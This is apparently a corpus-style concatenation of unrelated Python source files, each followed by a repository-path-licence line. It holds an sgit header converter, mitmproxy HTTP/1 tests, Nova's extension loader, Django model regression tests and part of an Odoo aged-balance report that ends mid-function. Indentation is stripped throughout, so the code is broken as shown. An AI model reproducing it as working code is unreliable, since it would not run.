# encoding: UTF-8
__author__ = 'CHENXY'
from sgit_data_type import *
import re
def main():
"""主函数"""
fcpp = open('SgitFtdcUserApiStruct.h', 'r')
fpy = open('sgit_struct.py', 'w')
fpy.write('# encoding: UTF-8\n')
fpy.write('\n')
fpy.write('structDict = {}\n')
fpy.write('\n')
for no, line in enumerate(fcpp):
# Comment on a struct declaration
if '///' in line and '\t' not in line:
py_line = '#' + line[3:]
# Comment on a struct member
elif '\t///' in line:
py_line = '#' + line[4:]
# Struct declaration
elif 'struct' in line:
content = line.split(' ')
name = content[-1].replace('\n','')
py_line = '%s = {}\n' % name
# Struct member
elif ' ' in line and '///' not in line and '{' not in line:
#content = line.split('\t')
if ' ;' in line:
line = line.replace(' ;', ';')
if ' ' in line:
line = re.sub(' +', '\t', line)
if '\t\t' in line:
line = re.sub('\t+', '\t', line)
if '//' in line:
n = line.index('//')
line = line[:n]
print no, ':', line
content = line.split('\t')
print content
typedef = content[1]
type_ = typedefDict[typedef]
variable = content[2].replace(';\n', "")
if ';' in variable:
variable = variable.replace(';', '')
py_line = '%s["%s"] = "%s"\n' % (name, variable, type_)
# End of struct
elif '}' in line:
py_line = "structDict['%s'] = %s\n\n" % (name, name)
# Start of struct
elif '{' in line:
py_line = ''
# Anything else
else:
py_line = '\n'
fpy.write(py_line.decode('gbk').encode('utf-8'))
if __name__ == '__main__':
main()
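# For illustration (hypothetical struct): a header declaration "struct CSgitFtdcFooField"
# with a tab-indented member "TSgitFtdcVolumeType Volume;" would be emitted roughly as
#   CSgitFtdcFooField = {}
#   CSgitFtdcFooField["Volume"] = "..."   # type string resolved via typedefDict
#   structDict['CSgitFtdcFooField'] = CSgitFtdcFooField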
| mit |
MatthewShao/mitmproxy | test/mitmproxy/proxy/protocol/test_http1.py | 6 | 3325 |
from unittest import mock
import pytest
from mitmproxy.test import tflow
from mitmproxy.net.http import http1
from mitmproxy.net.tcp import TCPClient
from mitmproxy.test.tutils import treq
from ... import tservers
class TestHTTPFlow:
def test_repr(self):
f = tflow.tflow(resp=True, err=True)
assert repr(f)
class TestInvalidRequests(tservers.HTTPProxyTest):
ssl = True
def test_double_connect(self):
p = self.pathoc()
with p.connect():
r = p.request("connect:'%s:%s'" % ("127.0.0.1", self.server2.port))
assert r.status_code == 400
assert b"Unexpected CONNECT" in r.content
def test_relative_request(self):
p = self.pathoc_raw()
with p.connect():
r = p.request("get:/p/200")
assert r.status_code == 400
assert b"Invalid HTTP request form" in r.content
class TestProxyMisconfiguration(tservers.TransparentProxyTest):
def test_absolute_request(self):
p = self.pathoc()
with p.connect():
r = p.request("get:'http://localhost:%d/p/200'" % self.server.port)
assert r.status_code == 400
assert b"misconfiguration" in r.content
class TestExpectHeader(tservers.HTTPProxyTest):
def test_simple(self):
client = TCPClient(("127.0.0.1", self.proxy.port))
client.connect()
# call pathod server, wait a second to complete the request
client.wfile.write(
b"POST http://localhost:%d/p/200 HTTP/1.1\r\n"
b"Expect: 100-continue\r\n"
b"Content-Length: 16\r\n"
b"\r\n" % self.server.port
)
client.wfile.flush()
assert client.rfile.readline() == b"HTTP/1.1 100 Continue\r\n"
assert client.rfile.readline() == b"\r\n"
client.wfile.write(b"0123456789abcdef\r\n")
client.wfile.flush()
resp = http1.read_response(client.rfile, treq())
assert resp.status_code == 200
client.finish()
client.close()
class TestHeadContentLength(tservers.HTTPProxyTest):
def test_head_content_length(self):
p = self.pathoc()
with p.connect():
resp = p.request(
"""head:'%s/p/200:h"Content-Length"="42"'""" % self.server.urlbase
)
assert resp.headers["Content-Length"] == "42"
class TestStreaming(tservers.HTTPProxyTest):
@pytest.mark.parametrize('streaming', [True, False])
def test_streaming(self, streaming):
class Stream:
def requestheaders(self, f):
f.request.stream = streaming
def responseheaders(self, f):
f.response.stream = streaming
def assert_write(self, v):
if streaming:
assert len(v) <= 4096
return self.o.write(v)
self.master.addons.add(Stream())
p = self.pathoc()
with p.connect():
with mock.patch("mitmproxy.net.tcp.Writer.write", side_effect=assert_write, autospec=True):
# response with 10000 bytes
r = p.request("post:'%s/p/200:b@10000'" % self.server.urlbase)
assert len(r.content) == 10000
# request with 10000 bytes
assert p.request("post:'%s/p/200':b@10000" % self.server.urlbase)
| mit |
gspilio/nova | nova/api/openstack/extensions.py | 7 | 13312 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import webob.dec
import webob.exc
import nova.api.openstack
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
import nova.policy
LOG = logging.getLogger(__name__)
class ExtensionDescriptor(object):
"""Base class that defines the contract for extensions.
Note that you don't have to derive from this class to have a valid
extension; it is purely a convenience.
"""
# The name of the extension, e.g., 'Fox In Socks'
name = None
# The alias for the extension, e.g., 'FOXNSOX'
alias = None
# Description comes from the docstring for the class
# The XML namespace for the extension, e.g.,
# 'http://www.fox.in.socks/api/ext/pie/v1.0'
namespace = None
# The timestamp when the extension was last updated, e.g.,
# '2011-01-22T13:25:27-06:00'
updated = None
def __init__(self, ext_mgr):
"""Register extension with the extension manager."""
ext_mgr.register(self)
self.ext_mgr = ext_mgr
def get_resources(self):
"""List of extensions.ResourceExtension extension objects.
Resources define new nouns, and are accessible through URLs.
"""
resources = []
return resources
def get_controller_extensions(self):
"""List of extensions.ControllerExtension extension objects.
Controller extensions are used to extend existing controllers.
"""
controller_exts = []
return controller_exts
@classmethod
def nsmap(cls):
"""Synthesize a namespace map from extension."""
# Start with a base nsmap
nsmap = ext_nsmap.copy()
# Add the namespace for the extension
nsmap[cls.alias] = cls.namespace
return nsmap
@classmethod
def xmlname(cls, name):
"""Synthesize element and attribute names."""
return '{%s}%s' % (cls.namespace, name)
def make_ext(elem):
elem.set('name')
elem.set('namespace')
elem.set('alias')
elem.set('updated')
desc = xmlutil.SubTemplateElement(elem, 'description')
desc.text = 'description'
xmlutil.make_links(elem, 'links')
ext_nsmap = {None: xmlutil.XMLNS_COMMON_V10, 'atom': xmlutil.XMLNS_ATOM}
class ExtensionTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('extension', selector='extension')
make_ext(root)
return xmlutil.MasterTemplate(root, 1, nsmap=ext_nsmap)
class ExtensionsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('extensions')
elem = xmlutil.SubTemplateElement(root, 'extension',
selector='extensions')
make_ext(elem)
return xmlutil.MasterTemplate(root, 1, nsmap=ext_nsmap)
class ExtensionsResource(wsgi.Resource):
def __init__(self, extension_manager):
self.extension_manager = extension_manager
super(ExtensionsResource, self).__init__(None)
def _translate(self, ext):
ext_data = {}
ext_data['name'] = ext.name
ext_data['alias'] = ext.alias
ext_data['description'] = ext.__doc__
ext_data['namespace'] = ext.namespace
ext_data['updated'] = ext.updated
ext_data['links'] = [] # TODO(dprince): implement extension links
return ext_data
@wsgi.serializers(xml=ExtensionsTemplate)
def index(self, req):
extensions = []
for ext in self.extension_manager.sorted_extensions():
extensions.append(self._translate(ext))
return dict(extensions=extensions)
@wsgi.serializers(xml=ExtensionTemplate)
def show(self, req, id):
try:
# NOTE(dprince): the extensions alias is used as the 'id' for show
ext = self.extension_manager.extensions[id]
except KeyError:
raise webob.exc.HTTPNotFound()
return dict(extension=self._translate(ext))
def delete(self, req, id):
raise webob.exc.HTTPNotFound()
def create(self, req):
raise webob.exc.HTTPNotFound()
class ExtensionManager(object):
"""Load extensions from the configured extension path.
See nova/tests/api/openstack/volume/extensions/foxinsocks.py for an
example extension implementation.
"""
def sorted_extensions(self):
if self.sorted_ext_list is None:
self.sorted_ext_list = sorted(self.extensions.iteritems())
for _alias, ext in self.sorted_ext_list:
yield ext
def is_loaded(self, alias):
return alias in self.extensions
def register(self, ext):
# Do nothing if the extension doesn't check out
if not self._check_extension(ext):
return
alias = ext.alias
LOG.audit(_('Loaded extension: %s'), alias)
if alias in self.extensions:
raise exception.NovaException("Found duplicate extension: %s"
% alias)
self.extensions[alias] = ext
self.sorted_ext_list = None
def get_resources(self):
"""Returns a list of ResourceExtension objects."""
resources = []
resources.append(ResourceExtension('extensions',
ExtensionsResource(self)))
for ext in self.sorted_extensions():
try:
resources.extend(ext.get_resources())
except AttributeError:
# NOTE(dprince): Extensions aren't required to have resource
# extensions
pass
return resources
def get_controller_extensions(self):
"""Returns a list of ControllerExtension objects."""
controller_exts = []
for ext in self.sorted_extensions():
try:
get_ext_method = ext.get_controller_extensions
except AttributeError:
# NOTE(Vek): Extensions aren't required to have
# controller extensions
continue
controller_exts.extend(get_ext_method())
return controller_exts
def _check_extension(self, extension):
"""Checks for required methods in extension objects."""
try:
LOG.debug(_('Ext name: %s'), extension.name)
LOG.debug(_('Ext alias: %s'), extension.alias)
LOG.debug(_('Ext description: %s'),
' '.join(extension.__doc__.strip().split()))
LOG.debug(_('Ext namespace: %s'), extension.namespace)
LOG.debug(_('Ext updated: %s'), extension.updated)
except AttributeError as ex:
LOG.exception(_("Exception loading extension: %s"), unicode(ex))
return False
return True
def load_extension(self, ext_factory):
"""Execute an extension factory.
Loads an extension. The 'ext_factory' is the name of a
callable that will be imported and called with one
argument--the extension manager. The factory callable is
expected to call the register() method at least once.
"""
LOG.debug(_("Loading extension %s"), ext_factory)
if isinstance(ext_factory, basestring):
# Load the factory
factory = importutils.import_class(ext_factory)
else:
factory = ext_factory
# Call it
LOG.debug(_("Calling extension factory %s"), ext_factory)
factory(self)
def _load_extensions(self):
"""Load extensions specified on the command line."""
extensions = list(self.cls_list)
for ext_factory in extensions:
try:
self.load_extension(ext_factory)
except Exception as exc:
LOG.warn(_('Failed to load extension %(ext_factory)s: '
'%(exc)s') % locals())
class ControllerExtension(object):
"""Extend core controllers of nova OpenStack API.
Provide a way to extend existing nova OpenStack API core
controllers.
"""
def __init__(self, extension, collection, controller):
self.extension = extension
self.collection = collection
self.controller = controller
class ResourceExtension(object):
"""Add top level resources to the OpenStack API in nova."""
def __init__(self, collection, controller=None, parent=None,
collection_actions=None, member_actions=None,
custom_routes_fn=None, inherits=None):
if not collection_actions:
collection_actions = {}
if not member_actions:
member_actions = {}
self.collection = collection
self.controller = controller
self.parent = parent
self.collection_actions = collection_actions
self.member_actions = member_actions
self.custom_routes_fn = custom_routes_fn
self.inherits = inherits
def wrap_errors(fn):
"""Ensure errors are not passed along."""
def wrapped(*args, **kwargs):
try:
return fn(*args, **kwargs)
except webob.exc.HTTPException:
raise
except Exception:
raise webob.exc.HTTPInternalServerError()
return wrapped
def load_standard_extensions(ext_mgr, logger, path, package, ext_list=None):
"""Registers all standard API extensions."""
# Walk through all the modules in our directory...
our_dir = path[0]
for dirpath, dirnames, filenames in os.walk(our_dir):
# Compute the relative package name from the dirpath
relpath = os.path.relpath(dirpath, our_dir)
if relpath == '.':
relpkg = ''
else:
relpkg = '.%s' % '.'.join(relpath.split(os.sep))
# Now, consider each file in turn, only considering .py files
for fname in filenames:
root, ext = os.path.splitext(fname)
# Skip __init__ and anything that's not .py
if ext != '.py' or root == '__init__':
continue
# Try loading it
classname = "%s%s" % (root[0].upper(), root[1:])
classpath = ("%s%s.%s.%s" %
(package, relpkg, root, classname))
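# For illustration (hypothetical file): a module at <our_dir>/foo_bar.py yields
# classname "Foo_bar" and classpath "<package>.foo_bar.Foo_bar".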
if ext_list is not None and classname not in ext_list:
logger.debug("Skipping extension: %s" % classpath)
continue
try:
ext_mgr.load_extension(classpath)
except Exception as exc:
logger.warn(_('Failed to load extension %(classpath)s: '
'%(exc)s') % locals())
# Now, let's consider any subdirectories we may have...
subdirs = []
for dname in dirnames:
# Skip it if it does not have __init__.py
if not os.path.exists(os.path.join(dirpath, dname,
'__init__.py')):
continue
# If it has extension(), delegate...
ext_name = ("%s%s.%s.extension" %
(package, relpkg, dname))
try:
ext = importutils.import_class(ext_name)
except ImportError:
# extension() doesn't exist on it, so we'll explore
# the directory for ourselves
subdirs.append(dname)
else:
try:
ext(ext_mgr)
except Exception as exc:
logger.warn(_('Failed to load extension %(ext_name)s: '
'%(exc)s') % locals())
# Update the list of directories we'll explore...
dirnames[:] = subdirs
def extension_authorizer(api_name, extension_name):
def authorize(context, target=None, action=None):
if target is None:
target = {'project_id': context.project_id,
'user_id': context.user_id}
if action is None:
act = '%s_extension:%s' % (api_name, extension_name)
else:
act = '%s_extension:%s:%s' % (api_name, extension_name, action)
nova.policy.enforce(context, act, target)
return authorize
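# Example (illustrative): extension_authorizer('compute', 'admin_actions') returns an
# authorize() callable that enforces the policy rule "compute_extension:admin_actions",
# or "compute_extension:admin_actions:<action>" when an action is supplied.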
def soft_extension_authorizer(api_name, extension_name):
hard_authorize = extension_authorizer(api_name, extension_name)
def authorize(context):
try:
hard_authorize(context)
return True
except exception.NotAuthorized:
return False
return authorize
| apache-2.0 |
bikong2/django | tests/model_regress/tests.py | 326 | 8962 |
from __future__ import unicode_literals
import datetime
from operator import attrgetter
from django.core.exceptions import ValidationError
from django.db import router
from django.db.models.sql import InsertQuery
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from django.utils.timezone import get_fixed_timezone
from .models import (
Article, BrokenUnicodeMethod, Department, Event, Model1, Model2, Model3,
NonAutoPK, Party, Worker,
)
class ModelTests(TestCase):
# The bug is that the following queries would raise:
# "TypeError: Related Field has invalid lookup: gte"
def test_related_gte_lookup(self):
"""
Regression test for #10153: foreign key __gte lookups.
"""
Worker.objects.filter(department__gte=0)
def test_related_lte_lookup(self):
"""
Regression test for #10153: foreign key __lte lookups.
"""
Worker.objects.filter(department__lte=0)
def test_sql_insert_compiler_return_id_attribute(self):
"""
Regression test for #14019: SQLInsertCompiler.as_sql() failure
"""
db = router.db_for_write(Party)
query = InsertQuery(Party)
query.insert_values([Party._meta.fields[0]], [], raw=False)
# this line will raise an AttributeError without the accompanying fix
query.get_compiler(using=db).as_sql()
def test_empty_choice(self):
# NOTE: Part of the regression test here is merely parsing the model
# declaration. The verbose_name, in particular, did not always work.
a = Article.objects.create(
headline="Look at me!", pub_date=datetime.datetime.now()
)
# An empty choice field should return None for the display name.
self.assertIs(a.get_status_display(), None)
# Empty strings should be returned as Unicode
a = Article.objects.get(pk=a.pk)
self.assertEqual(a.misc_data, '')
self.assertIs(type(a.misc_data), six.text_type)
def test_long_textfield(self):
# TextFields can hold more than 4000 characters (this was broken in
# Oracle).
a = Article.objects.create(
headline="Really, really big",
pub_date=datetime.datetime.now(),
article_text="ABCDE" * 1000
)
a = Article.objects.get(pk=a.pk)
self.assertEqual(len(a.article_text), 5000)
def test_long_unicode_textfield(self):
# TextFields can hold more than 4000 bytes also when they are
# less than 4000 characters
a = Article.objects.create(
headline="Really, really big",
pub_date=datetime.datetime.now(),
article_text='\u05d0\u05d1\u05d2' * 1000
)
a = Article.objects.get(pk=a.pk)
self.assertEqual(len(a.article_text), 3000)
def test_date_lookup(self):
# Regression test for #659
Party.objects.create(when=datetime.datetime(1999, 12, 31))
Party.objects.create(when=datetime.datetime(1998, 12, 31))
Party.objects.create(when=datetime.datetime(1999, 1, 1))
Party.objects.create(when=datetime.datetime(1, 3, 3))
self.assertQuerysetEqual(
Party.objects.filter(when__month=2), []
)
self.assertQuerysetEqual(
Party.objects.filter(when__month=1), [
datetime.date(1999, 1, 1)
],
attrgetter("when")
)
self.assertQuerysetEqual(
Party.objects.filter(when__month=12), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__year=1998), [
datetime.date(1998, 12, 31),
],
attrgetter("when")
)
# Regression test for #8510
self.assertQuerysetEqual(
Party.objects.filter(when__day="31"), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__month="12"), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__year="1998"), [
datetime.date(1998, 12, 31),
],
attrgetter("when")
)
# Regression test for #18969
self.assertQuerysetEqual(
Party.objects.filter(when__year=1), [
datetime.date(1, 3, 3),
],
attrgetter("when")
)
self.assertQuerysetEqual(
Party.objects.filter(when__year='1'), [
datetime.date(1, 3, 3),
],
attrgetter("when")
)
def test_date_filter_null(self):
# Date filtering was failing with NULL date values in SQLite
# (regression test for #3501, among other things).
Party.objects.create(when=datetime.datetime(1999, 1, 1))
Party.objects.create()
p = Party.objects.filter(when__month=1)[0]
self.assertEqual(p.when, datetime.date(1999, 1, 1))
self.assertQuerysetEqual(
Party.objects.filter(pk=p.pk).dates("when", "month"), [
1
],
attrgetter("month")
)
def test_get_next_prev_by_field(self):
# Check that get_next_by_FIELD and get_previous_by_FIELD don't crash
# when we have usecs values stored on the database
#
# It crashed after the Field.get_db_prep_* refactor, because on most
# backends DateTimeFields supports usecs, but DateTimeField.to_python
# didn't recognize them. (Note that
# Model._get_next_or_previous_by_FIELD coerces values to strings)
Event.objects.create(when=datetime.datetime(2000, 1, 1, 16, 0, 0))
Event.objects.create(when=datetime.datetime(2000, 1, 1, 6, 1, 1))
Event.objects.create(when=datetime.datetime(2000, 1, 1, 13, 1, 1))
e = Event.objects.create(when=datetime.datetime(2000, 1, 1, 12, 0, 20, 24))
self.assertEqual(
e.get_next_by_when().when, datetime.datetime(2000, 1, 1, 13, 1, 1)
)
self.assertEqual(
e.get_previous_by_when().when, datetime.datetime(2000, 1, 1, 6, 1, 1)
)
def test_primary_key_foreign_key_types(self):
# Check Department and Worker (non-default PK type)
d = Department.objects.create(id=10, name="IT")
w = Worker.objects.create(department=d, name="Full-time")
self.assertEqual(six.text_type(w), "Full-time")
def test_broken_unicode(self):
# Models with broken unicode methods should still have a printable repr
b = BrokenUnicodeMethod.objects.create(name="Jerry")
self.assertEqual(repr(b), "<BrokenUnicodeMethod: [Bad Unicode data]>")
@skipUnlessDBFeature("supports_timezones")
def test_timezones(self):
# Saving and updating with timezone-aware datetime Python objects.
# Regression test for #10443.
# The idea is that all these creations and saving should work without
# crashing. It's not rocket science.
dt1 = datetime.datetime(2008, 8, 31, 16, 20, tzinfo=get_fixed_timezone(600))
dt2 = datetime.datetime(2008, 8, 31, 17, 20, tzinfo=get_fixed_timezone(600))
obj = Article.objects.create(
headline="A headline", pub_date=dt1, article_text="foo"
)
obj.pub_date = dt2
obj.save()
self.assertEqual(
Article.objects.filter(headline="A headline").update(pub_date=dt1),
1
)
def test_chained_fks(self):
"""
Regression for #18432: Chained foreign keys with to_field produce incorrect query
"""
m1 = Model1.objects.create(pkey=1000)
m2 = Model2.objects.create(model1=m1)
m3 = Model3.objects.create(model2=m2)
# this is the actual test for #18432
m3 = Model3.objects.get(model2=1000)
m3.model2
class ModelValidationTest(TestCase):
def test_pk_validation(self):
NonAutoPK.objects.create(name="one")
again = NonAutoPK(name="one")
self.assertRaises(ValidationError, again.validate_unique)
class EvaluateMethodTest(TestCase):
"""
Regression test for #13640: cannot filter by objects with 'evaluate' attr
"""
def test_model_with_evaluate_method(self):
"""
Ensures that you can filter by objects that have an 'evaluate' attr
"""
dept = Department.objects.create(pk=1, name='abc')
dept.evaluate = 'abc'
Worker.objects.filter(department=dept)
| bsd-3-clause |
windedge/odoo | addons/account/report/account_aged_partner_balance.py | 152 | 21511 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
from common_report_header import common_report_header
class aged_trial_report(report_sxw.rml_parse, common_report_header):
def __init__(self, cr, uid, name, context):
super(aged_trial_report, self).__init__(cr, uid, name, context=context)
self.total_account = []
self.localcontext.update({
'time': time,
'get_lines_with_out_partner': self._get_lines_with_out_partner,
'get_lines': self._get_lines,
'get_total': self._get_total,
'get_direction': self._get_direction,
'get_for_period': self._get_for_period,
'get_company': self._get_company,
'get_currency': self._get_currency,
'get_partners':self._get_partners,
'get_account': self._get_account,
'get_fiscalyear': self._get_fiscalyear,
'get_target_move': self._get_target_move,
})
def set_context(self, objects, data, ids, report_type=None):
obj_move = self.pool.get('account.move.line')
ctx = data['form'].get('used_context', {})
ctx.update({'fiscalyear': False, 'all_fiscalyear': True})
self.query = obj_move._query_get(self.cr, self.uid, obj='l', context=ctx)
self.direction_selection = data['form'].get('direction_selection', 'past')
self.target_move = data['form'].get('target_move', 'all')
self.date_from = data['form'].get('date_from', time.strftime('%Y-%m-%d'))
if (data['form']['result_selection'] == 'customer' ):
self.ACCOUNT_TYPE = ['receivable']
elif (data['form']['result_selection'] == 'supplier'):
self.ACCOUNT_TYPE = ['payable']
else:
self.ACCOUNT_TYPE = ['payable','receivable']
return super(aged_trial_report, self).set_context(objects, data, ids, report_type=report_type)
def _get_lines(self, form):
res = []
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
self.cr.execute('SELECT DISTINCT res_partner.id AS id,\
res_partner.name AS name \
FROM res_partner,account_move_line AS l, account_account, account_move am\
WHERE (l.account_id=account_account.id) \
AND (l.move_id=am.id) \
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND account_account.active\
AND ((reconcile_id IS NULL)\
OR (reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND (l.partner_id=res_partner.id)\
AND (l.date <= %s)\
AND ' + self.query + ' \
ORDER BY res_partner.name', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, self.date_from,))
partners = self.cr.dictfetchall()
        ## reset the totals to zero
for i in range(7):
self.total_account.append(0)
#
        # Collect the partner ids; they are passed as a tuple parameter to the SQL queries below
partner_ids = [x['id'] for x in partners]
if not partner_ids:
return []
# This dictionary will store the debit-credit for all partners, using partner_id as key.
totals = {}
self.cr.execute('SELECT l.partner_id, SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id = account_account.id) AND (l.move_id=am.id) \
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND (l.partner_id IN %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND ' + self.query + '\
AND account_account.active\
AND (l.date <= %s)\
GROUP BY l.partner_id ', (tuple(move_state), tuple(self.ACCOUNT_TYPE), tuple(partner_ids), self.date_from, self.date_from,))
t = self.cr.fetchall()
for i in t:
totals[i[0]] = i[1]
        # This dictionary will store the future or past balance of all partners
future_past = {}
if self.direction_selection == 'future':
self.cr.execute('SELECT l.partner_id, SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id=account_account.id) AND (l.move_id=am.id) \
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND (COALESCE(l.date_maturity, l.date) < %s)\
AND (l.partner_id IN %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active\
AND (l.date <= %s)\
GROUP BY l.partner_id', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, tuple(partner_ids),self.date_from, self.date_from,))
t = self.cr.fetchall()
for i in t:
future_past[i[0]] = i[1]
elif self.direction_selection == 'past': # Using elif so people could extend without this breaking
self.cr.execute('SELECT l.partner_id, SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id=account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND (COALESCE(l.date_maturity,l.date) > %s)\
AND (l.partner_id IN %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active\
AND (l.date <= %s)\
GROUP BY l.partner_id', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, tuple(partner_ids), self.date_from, self.date_from,))
t = self.cr.fetchall()
for i in t:
future_past[i[0]] = i[1]
# Use one query per period and store results in history (a list variable)
# Each history will contain: history[1] = {'<partner_id>': <partner_debit-credit>}
history = []
for i in range(5):
args_list = (tuple(move_state), tuple(self.ACCOUNT_TYPE), tuple(partner_ids),self.date_from,)
dates_query = '(COALESCE(l.date_maturity,l.date)'
if form[str(i)]['start'] and form[str(i)]['stop']:
dates_query += ' BETWEEN %s AND %s)'
args_list += (form[str(i)]['start'], form[str(i)]['stop'])
elif form[str(i)]['start']:
dates_query += ' >= %s)'
args_list += (form[str(i)]['start'],)
else:
dates_query += ' <= %s)'
args_list += (form[str(i)]['stop'],)
args_list += (self.date_from,)
self.cr.execute('''SELECT l.partner_id, SUM(l.debit-l.credit), l.reconcile_partial_id
FROM account_move_line AS l, account_account, account_move am
WHERE (l.account_id = account_account.id) AND (l.move_id=am.id)
AND (am.state IN %s)
AND (account_account.type IN %s)
AND (l.partner_id IN %s)
AND ((l.reconcile_id IS NULL)
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))
AND ''' + self.query + '''
AND account_account.active
AND ''' + dates_query + '''
AND (l.date <= %s)
GROUP BY l.partner_id, l.reconcile_partial_id''', args_list)
partners_partial = self.cr.fetchall()
partners_amount = dict((i[0],0) for i in partners_partial)
for partner_info in partners_partial:
if partner_info[2]:
                    # in case of partial reconciliation, we want to keep the leftover amount in the oldest period
self.cr.execute('''SELECT MIN(COALESCE(date_maturity,date)) FROM account_move_line WHERE reconcile_partial_id = %s''', (partner_info[2],))
date = self.cr.fetchall()
partial = False
if 'BETWEEN' in dates_query:
partial = date and args_list[-3] <= date[0][0] <= args_list[-2]
elif '>=' in dates_query:
partial = date and date[0][0] >= form[str(i)]['start']
else:
partial = date and date[0][0] <= form[str(i)]['stop']
if partial:
                        # partial reconciliation
                        limit_date = 'COALESCE(l.date_maturity,l.date) %s %%s' % ('<=' if self.direction_selection == 'past' else '>=')
self.cr.execute('''SELECT SUM(l.debit-l.credit)
FROM account_move_line AS l, account_move AS am
WHERE l.move_id = am.id AND am.state in %s
AND l.reconcile_partial_id = %s
AND ''' + limit_date, (tuple(move_state), partner_info[2], self.date_from))
unreconciled_amount = self.cr.fetchall()
partners_amount[partner_info[0]] += unreconciled_amount[0][0]
else:
partners_amount[partner_info[0]] += partner_info[1]
history.append(partners_amount)
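        # Note: after the loop above, `history` holds one dict per ageing period, mapping
        # partner_id to that partner's balance in the period, while `totals` maps each
        # partner_id to its overall debit-credit balance.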
for partner in partners:
values = {}
            ## If choice selection is in the future
if self.direction_selection == 'future':
                # Query here is replaced by one query which gets the 'before' value for all the partners at once
before = False
if future_past.has_key(partner['id']):
before = [ future_past[partner['id']] ]
self.total_account[6] = self.total_account[6] + (before and before[0] or 0.0)
values['direction'] = before and before[0] or 0.0
elif self.direction_selection == 'past': # Changed this so people could in the future create new direction_selections
                # Query here is replaced by one query which gets the 'after' value for all the partners at once
after = False
if future_past.has_key(partner['id']): # Making sure this partner actually was found by the query
after = [ future_past[partner['id']] ]
self.total_account[6] = self.total_account[6] + (after and after[0] or 0.0)
values['direction'] = after and after[0] or 0.0
for i in range(5):
during = False
if history[i].has_key(partner['id']):
during = [ history[i][partner['id']] ]
                # add this period's amount to the running per-period total
self.total_account[(i)] = self.total_account[(i)] + (during and during[0] or 0)
values[str(i)] = during and during[0] or 0.0
total = False
if totals.has_key( partner['id'] ):
total = [ totals[partner['id']] ]
values['total'] = total and total[0] or 0.0
## Add for total
self.total_account[(i+1)] = self.total_account[(i+1)] + (total and total[0] or 0.0)
values['name'] = partner['name']
res.append(values)
total = 0.0
totals = {}
for r in res:
total += float(r['total'] or 0.0)
for i in range(5)+['direction']:
totals.setdefault(str(i), 0.0)
totals[str(i)] += float(r[str(i)] or 0.0)
return res
def _get_lines_with_out_partner(self, form):
res = []
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
        ## reset the totals to zero
for i in range(7):
self.total_account.append(0)
totals = {}
self.cr.execute('SELECT SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id = account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (l.partner_id IS NULL)\
AND (account_account.type IN %s)\
AND ((l.reconcile_id IS NULL) \
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND ' + self.query + '\
AND (l.date <= %s)\
AND account_account.active ',(tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, self.date_from,))
